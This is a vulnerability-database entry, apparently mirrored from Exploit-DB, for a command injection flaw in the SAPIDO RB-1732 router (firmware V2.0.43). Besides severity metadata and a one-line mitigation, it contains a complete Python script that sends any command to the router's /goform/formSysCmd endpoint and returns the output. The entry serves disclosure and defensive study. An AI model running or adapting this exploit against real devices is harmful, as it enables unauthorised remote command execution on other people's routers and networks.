SAPIDO RB-1732 command line execution

vendor:

RB-1732

by:

k1nm3n.aotoi

7.5

CVSS

HIGH

Command Injection

CWE

Product Name: RB-1732

Affected Version From: RB-1732 V2.0.43

Affected Version To: RB-1732 V2.0.43

Patch Exists: N/A

Related CWE: N/A

CPE: h:sapido:rb-1732

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2019

SAPIDO RB-1732 command line execution

This exploit allows an attacker to execute arbitrary commands on the vulnerable SAPIDO RB-1732 router. The exploit sends a POST request to the router's /goform/formSysCmd page with the command to be executed in the sysCmd parameter. The response contains the output of the command in a textarea element.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in system commands.

Source

Exploit-DB raw data:

# Exploit Title: SAPIDO RB-1732 command line execution
# Date: 2019-6-24
# Exploit Author: k1nm3n.aotoi
# Vendor Homepage: http://www.sapido.com.tw/
# Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732_TC_v2.0.43.bin
# Version: RB-1732 V2.0.43 
# Tested on: linux

 
import requests
import sys
 
def test_httpcommand(ip, command):
   my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
   r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)
   content = r.text
   content = content[
     content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:
     content.rfind('</textarea>')]
   return content
 
print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))